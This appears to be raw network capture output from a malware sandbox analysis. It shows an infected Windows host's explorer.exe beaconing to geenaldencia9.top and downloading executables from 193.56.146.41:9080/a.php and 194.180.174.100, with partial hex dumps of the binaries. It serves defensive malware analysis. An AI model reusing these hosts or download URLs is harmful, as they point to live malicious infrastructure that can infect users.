00 00 00 00 00 00 00 20 01 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 01 01 00 00 10 00 00 00 02 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ef 31 00 00 00 20 01 00 00 32 00 00 00 06 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 7c 55 08 00 00 60 01 00 00 1e 00 00 00 38 
01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 a8 00 00 00 c0 09 00 00 aa 00 00 00 56 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_H, @pQO,I<!4@ |.text `.rdata1 2@@.data|U`8@.rsrcV@@


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
30 | 192.168.2.6 | 49833 | 194.147.85.186 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 19:35:06.432357073 CEST | 23023 | OUT | POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://geenaldencia9.top/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 161
Host: geenaldencia9.top
Sep 27, 2021 19:35:06.577622890 CEST | 23023 | IN | HTTP/1.1 200 OK
Date: Mon, 27 Sep 2021 17:35:06 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
X-Powered-By: PHP/5.5.38
Content-Length: 25
Connection: close
Content-Type: text/html; charset=utf-8
Data Raw: 4e 6f 20 73 75 63 68 20 66 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79
Data Ascii: No such file or directory


Session ID: 31 | Source IP: 192.168.2.6 | Source Port: 49834 | Destination IP: 194.147.85.186 | Destination Port: 80 | Process: C:\Windows\explorer.exe

Timestamp: Sep 27, 2021 19:35:07.609843969 CEST | kBytes transferred: 23024 | Direction: OUT
Data:
  POST / HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://geenaldencia9.top/
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Length: 150
  Host: geenaldencia9.top

Timestamp: Sep 27, 2021 19:35:07.780843973 CEST | kBytes transferred: 23025 | Direction: IN
Data:
  HTTP/1.1 200 OK
  Date: Mon, 27 Sep 2021 17:35:07 GMT
  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
  X-Powered-By: PHP/5.5.38
  Content-Length: 25
  Connection: close
  Content-Type: text/html; charset=utf-8
  Data Raw: 4e 6f 20 73 75 63 68 20 66 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79
  Data Ascii: No such file or directory


Session ID: 32 | Source IP: 192.168.2.6 | Source Port: 49835 | Destination IP: 194.147.85.186 | Destination Port: 80 | Process: C:\Windows\explorer.exe

Timestamp: Sep 27, 2021 19:35:08.092586040 CEST | kBytes transferred: 23026 | Direction: OUT
Data:
  POST / HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://geenaldencia9.top/
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Length: 319
  Host: geenaldencia9.top

Timestamp: Sep 27, 2021 19:35:08.227099895 CEST | kBytes transferred: 23027 | Direction: IN
Data:
  HTTP/1.1 200 OK
  Date: Mon, 27 Sep 2021 17:35:08 GMT
  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
  X-Powered-By: PHP/5.5.38
  Content-Length: 25
  Connection: close
  Content-Type: text/html; charset=utf-8
  Data Raw: 4e 6f 20 73 75 63 68 20 66 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79
  Data Ascii: No such file or directory


Session ID: 33 | Source IP: 192.168.2.6 | Source Port: 49836 | Destination IP: 194.147.85.186 | Destination Port: 80 | Process: C:\Windows\explorer.exe

Timestamp: Sep 27, 2021 19:35:08.486690044 CEST | kBytes transferred: 23028 | Direction: OUT
Data:
  POST / HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://geenaldencia9.top/
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Length: 231
  Host: geenaldencia9.top

Timestamp: Sep 27, 2021 19:35:08.640366077 CEST | kBytes transferred: 23028 | Direction: IN
Data:
  HTTP/1.1 200 OK
  Date: Mon, 27 Sep 2021 17:35:08 GMT
  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
  X-Powered-By: PHP/5.5.38
  Content-Length: 25
  Connection: close
  Content-Type: text/html; charset=utf-8
  Data Raw: 4e 6f 20 73 75 63 68 20 66 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79
  Data Ascii: No such file or directory


Session ID: 34 | Source IP: 192.168.2.6 | Source Port: 49838 | Destination IP: 194.147.85.186 | Destination Port: 80 | Process: C:\Windows\explorer.exe

Timestamp: Sep 27, 2021 19:35:08.959021091 CEST | kBytes transferred: 23033 | Direction: OUT
Data:
  POST / HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://geenaldencia9.top/
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Length: 310
  Host: geenaldencia9.top

Timestamp: Sep 27, 2021 19:35:09.093051910 CEST | kBytes transferred: 23034 | Direction: IN
Data:
  HTTP/1.1 200 OK
  Date: Mon, 27 Sep 2021 17:35:09 GMT
  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
  X-Powered-By: PHP/5.5.38
  Content-Length: 25
  Connection: close
  Content-Type: text/html; charset=utf-8
  Data Raw: 4e 6f 20 73 75 63 68 20 66 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79
  Data Ascii: No such file or directory


Session ID: 35 | Source IP: 192.168.2.6 | Source Port: 49839 | Destination IP: 194.147.85.186 | Destination Port: 80 | Process: C:\Windows\explorer.exe

Timestamp: Sep 27, 2021 19:35:09.321271896 CEST | kBytes transferred: 23035 | Direction: OUT
Data:
  POST / HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://geenaldencia9.top/
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Length: 153
  Host: geenaldencia9.top

Timestamp: Sep 27, 2021 19:35:09.466738939 CEST | kBytes transferred: 23036 | Direction: IN
Data:
  HTTP/1.1 404 Not Found
  Date: Mon, 27 Sep 2021 17:35:09 GMT
  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
  X-Powered-By: PHP/5.5.38
  Content-Length: 327
  Connection: close
  Content-Type: text/html; charset=utf-8
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID: 36 | Source IP: 192.168.2.6 | Source Port: 49840 | Destination IP: 194.147.85.186 | Destination Port: 80 | Process: C:\Windows\explorer.exe

Timestamp: Sep 27, 2021 19:35:09.571913958 CEST | kBytes transferred: 23037 | Direction: OUT
Data:
  POST / HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://geenaldencia9.top/
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Length: 198
  Host: geenaldencia9.top

Timestamp: Sep 27, 2021 19:35:09.718595982 CEST | kBytes transferred: 23038 | Direction: IN
Data:
  HTTP/1.1 404 Not Found
  Date: Mon, 27 Sep 2021 17:35:09 GMT
  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
  X-Powered-By: PHP/5.5.38
  Content-Length: 43
  Connection: close
  Content-Type: text/html; charset=utf-8
  Data Raw: 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 de 15 49 3e 44 be f7 d8 e4 e4 45 f5 46 87 32 ef 06 10 95 4b e1 e1 39
  Data Ascii: I:82OI>DEF2K9


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  37192.168.2.649841193.56.146.419080C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 19:35:09.806711912 CEST | 23038 | OUT | GET /a.php HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 193.56.146.41:9080
Sep 27, 2021 19:35:09.880815029 CEST | 23039 | IN | HTTP/1.1 200 OK
Date: Mon, 27 Sep 2021 17:35:08 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Transfer-Encoding: Binary
Content-disposition: attachment; filename="rqxeatnp8r.exe"
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/octet-stream
Data Ascii: 24a00MZ@!L!This program cannot be run in DOS mode.$PELbd`LH,`@T,<at@`|.textKL `.rdata1`2P@@.data|U@.rsrc@@


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
38 | 192.168.2.6 | 49842 | 194.147.85.186 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 19:35:12.495538950 CEST | 23195 | OUT | POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://geenaldencia9.top/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 304
Host: geenaldencia9.top
Sep 27, 2021 19:35:12.650259972 CEST | 23196 | IN | HTTP/1.1 404 Not Found
Date: Mon, 27 Sep 2021 17:35:12 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
X-Powered-By: PHP/5.5.38
Content-Length: 327
Connection: close
Content-Type: text/html; charset=utf-8
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
39 | 192.168.2.6 | 49843 | 194.180.174.100 | 80 |
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 19:35:20.408343077 CEST | 23202 | OUT | POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: text/plain; charset=UTF-8
Content-Length: 132
Host: 194.180.174.100
Sep 27, 2021 19:35:20.833514929 CEST | 23204 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 Sep 2021 17:35:20 GMT
Content-Type: text/plain;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Sep 27, 2021 19:35:20.921103001 CEST | 23209 | OUT | GET //l/f/1pHWJnwB3dP17SpzF3sp/6cbf9ba43fa4774c97b7a910fd83e29808663306 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: 194.180.174.100
Sep 27, 2021 19:35:21.199342966 CEST | 23211 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 Sep 2021 17:35:21 GMT
Content-Type: application/octet-stream
Content-Length: 916735
Connection: keep-alive
Last-Modified: Wed, 01 Sep 2021 16:21:39 GMT
ETag: "612fa893-dfcff"
Accept-Ranges: bytes
Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELt\!Zpa H 03.textXXZ`P`.datap`@`.rdata |@`@.bss(`.edata "@0@.idataH@0.CRT,@0.tls @0.rsrc @0.reloc304@0B/4p@@B/19@B/31 @B/45@@B/57`@0B/70ip@B/81@B/92


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.6 | 49774 | 194.147.85.186 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 19:34:21.890801907 CEST | 1758 | OUT | POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://geenaldencia9.top/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 126
Host: geenaldencia9.top
Sep 27, 2021 19:34:22.051820040 CEST | 1946 | IN | HTTP/1.1 404 Not Found
Date: Mon, 27 Sep 2021 17:34:21 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
X-Powered-By: PHP/5.5.38
Content-Length: 327
Connection: close
Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.6 | 49775 | 194.147.85.186 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 19:34:22.513164043 CEST | 1961 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://geenaldencia9.top/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 352
                                                                                                                                                                                                  Host: geenaldencia9.top
Sep 27, 2021 19:34:22.659954071 CEST | 1963 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                  Date: Mon, 27 Sep 2021 17:34:22 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                                                                                                  X-Powered-By: PHP/5.5.38
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Data Raw: 36 62 63 30 32 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c 68 9f c0 56 8f 8c f5 cf 9b 2b 25 9b f6 ba e5 1a b0 1c 67 74 d2 5f 9e 87 cd 25 80 78 51 a1 a2 8f 1c 3d d9 1c e0 32 02 50 08 e8 de e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1d 27 f4 d2 af 34 91 b4 b9 e1 85 20 59 55 11 5c 7c 3b 66 ab 48 11 80 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 99 ca cd 8a 58 d8 06 0e 45 67 15 7d cb ff e0 04 89 f9 d4 57 80 90 70 89 ec e4 4a 6b b6 f2 a2 22 48 32 d5 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 f3 97 5e 96 da 19 d1 3a 2d 12 45 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 d5 83 4a 04 38 cd 79 14 2c d2 e8 b1 14 c5 77 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 c2 46 64 cd 25 5c 8d b7 19 25 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 95 32 b3 be 34 56 9b 46 76 99 86 11 00 83 32 42 4a 34 ce ae b4 64 95 36 e1 48 50 67 75 50 b8 81 f6 bc 81 de bb 6e 6a 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 
f5 b8 d0 f1 b5 60 4a 1f 7d 54 7a 98 6c 39 c0 20 f0 5c 19 6a 16 90 be 07 3c a9 9b 3e 05 28 07 c0 6f 68 60 b9 10 1b eb cc ec 25 15 8e b7 82 7f 9e 50 b6 f7 b9 4e a1 20 49 a0 48 2e 69 87 57 33 6a c6 83 2b 4d 30 ae b8 c6 53 11 a0 57 1e 49 94 bd 77 6c 4d ab 7c 8f ef 22 3d 4e 83 ba 87 7a 8e 56 2d e2 98 0e 7b d0 0e 02 2c 0f 70 b8 98 48 0b a7 b2 ba 08 85 f7 fc 86 42 b7 22 ff f2 da 14 79 8c a6 bb 08 c0 f8 f7 c4 1d 2b 11 95 c8 a7 9a a1 b2 13 3d 1d 0f 1a 1b ed e8 f5 6c 8d 95 15 fb 86 6f ce e7 3d ef bd e9 6e 73 72 e7 f9 a6 f5 c9 6a c4 b3 d3 29 11 4a c4 a5 ce 49 77 ca 15 8d c6 dd 39 6b a5 b3 8b 47 ee 0f 3d 8c da 06 bf 37 87 9d b7 1c bf 2c 58 b2 09 7f 08 d8 f3 c2 ea 4a 26 4e 38 2d 6f 71 54 a7 49 4d 84 99 fb 5d 13 f9 ad a1 81 eb 83 f3 bd 99 93 11 67 c7 2c 31 3f c6 86 8c d8 07 af 63 9f 21 1c a8 1f 19 18 6d 32 cc c3 61 a8 c3 e5 0b 5b 96 23 c4 19 ac d8 8e 34 33 a2 43 77 58 d8 b8 fe 80 3f d8 26 95 43 43 a0 08 f8 fc 22 76 f3 3c f7 0b 64 84 fc 7d 4f 55 be b7 5a c3 d5 c4 a2 0b 2e e9 1e 69 1a de ff 3d c2 03 70 3f 6c dc ce 6a db a3 1c f2 1c 22 bd c2 aa a0 23 ef ba a3 8c cc 82 00 45 59 ff 66 3c 3b f0 b3 cb 67 5a f2 97 24 db 89 fa f0 ec e8 57 2d a2 a1 11 08 b3 66 69 ad 0c 51 96 17 8f 2d db 64 73 84 f7 56 5c 38 c2 d9 09 98 20 14 11 db 2b 43 50 1b 6f b3 27 1d 08 87 90 3f bc fb 99 13 cf cf f5 5b ca 31 c6 c5 a1 a5 91 3a 9e fe 1e e6 5c 32 a2 22 21 d0 34 0b d7 d9 1a ed 8d 10 ae 8d 90 97 57 05 bb a8 43 59 9d 9b e4 d5 f5 cf 2f 92 99 92 ff b3 4f 13 fd 86 0a 9f 46 79 2b
                                                                                                                                                                                                  Data Ascii: 6bc02S(SW\/iP"&&grq|6?eIJ5~/ar"`g1Q5ih.Kw:i/+".]pW!RY8|hV+%gt_%xQ=2P0YObyT=a'4 YU\|;fHXKg[Ge92)g z6XEg}WpJk"H2I?o|6NI[LeU[0z;+W~5=PVpGZlqV@q!Uvy^:-E%GkKm@NQ>[J8y,w"JG0Z"?kQTJMQFd%\%&Q#F<pvA>C/CbGB24VFv2BJ4d6HPguPnj6'NGc_,/DO9W%`J}Tzl9 \j<>(oh`%PN IH.iW3j+M0SWIwlM|"=NzV-{,pHB"y+=lo=nsrj)JIw9kG=7,XJ&N8-oqTIM]g,1?c!m2a[#43CwX?&CC"v<d}OUZ.i=p?lj"#EYf<;gZ$W-fiQ-dsV\8 +CPo'?[1:\2"!4WCY/OFy+


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.6 | 49776 | 194.147.85.186 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 19:34:23.641227961 CEST | 2420 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://geenaldencia9.top/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 348
                                                                                                                                                                                                  Host: geenaldencia9.top
Sep 27, 2021 19:34:23.797816038 CEST | 2421 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                  Date: Mon, 27 Sep 2021 17:34:23 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                                                                                                  X-Powered-By: PHP/5.5.38
                                                                                                                                                                                                  Content-Length: 327
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.6 | 49777 | 194.147.85.186 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 19:34:23.893903971 CEST | 2422 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://geenaldencia9.top/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 287
                                                                                                                                                                                                  Host: geenaldencia9.top
Sep 27, 2021 19:34:24.056574106 CEST | 2423 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                  Date: Mon, 27 Sep 2021 17:34:23 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                                                                                                  X-Powered-By: PHP/5.5.38
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
